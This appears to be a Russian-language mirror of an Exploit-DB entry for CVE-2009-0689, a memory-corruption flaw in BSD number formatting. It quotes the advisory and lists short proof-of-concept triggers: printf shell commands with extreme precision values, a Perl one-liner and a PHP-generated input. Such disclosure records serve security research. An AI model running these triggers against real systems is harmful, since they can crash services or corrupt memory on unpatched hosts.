- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 33058
- Проверка EDB
-
- Пройдено
- Автор
- MAKSYMILIAN ARCIEMOWICZ
- Тип уязвимости
- DOS
- Платформа
- MULTIPLE
- CVE
- cve-2009-0689
- Дата публикации
- 2009-05-26
Код:
source: https://www.securityfocus.com/bid/35510/info
Multiple BSD distributions are prone to a memory-corruption vulnerability because the software fails to properly bounds-check data used as an array index.
Attackers may exploit this issue to execute arbitrary code within the context of affected applications.
The following are vulnerable:
OpenBSD 4.5
NetBSD 5.0
FreeBSD 6.4 and 7.2
Other software based on the BSD code base may also be affected.
The following proof-of-concept shell commands are available:
printf %1.262159f 1.1
printf %11.2109999999f
printf %11.2009999999f
printf %11.2009999999f
The following proof-of-concept Perl script is available:
#!/usr/local/bin/perl
printf "%0.4194310f", 0x0.0x41414141;
The following proof-of-concept J program is available:
cxib=0.<?php echo str_repeat("1",296450); ?>- Источник
- www.exploit-db.com
